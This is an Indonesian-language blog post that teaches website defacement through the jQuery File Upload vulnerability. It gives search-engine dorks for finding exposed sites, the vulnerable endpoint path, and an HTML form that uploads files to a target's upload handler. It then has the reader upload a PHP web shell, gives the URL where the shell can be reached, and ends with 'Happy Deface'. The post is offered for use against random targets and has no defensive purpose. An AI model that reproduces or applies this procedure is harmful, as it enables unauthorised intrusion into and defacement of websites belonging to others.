Tutorial Deface Dengan JQuery File Upload Vulnerability

Kali ini saya akan membagikan teknik deface dengan Metode Jquery File Upload teknik ini sangat mudah di pelajari langsung aja ke TKP.

Tutorial Deface Dengan JQuery File Upload Vulnerability

Dork : /assets/global/plugins/jquery-file-upload/

inurl:"assets/global/plugins/jquery-file-upload/"

intext:"assets/global/plugins/jquery-file-upload/"

inurl:"/assets/global/plugins/jquery-file-upload/server/php/files/"

(sisanya kembangin sendiri)

Exploit : http://target/assets/global/plugins/jquery-file-upload/server/php/

Jika Vuln maka tampilannya sama seperti "FormCraft"

Copy script CSRF nya di bawah.

<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Jika sudah di save, silahkan buka filenya dengan browser yang anda gunakan lalu upload shellnya.

Jika upload berhasil maka akan tampil nama shell anda, jika nama shell anda tidak tampil saya sarankan cari target lain

Shell Access : target.com/assets/global/plugins/jquery-file-upload/server/php/files/namashell.php

Happy Deface :)

Belum ada Komentar untuk "Tutorial Deface Dengan JQuery File Upload Vulnerability"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel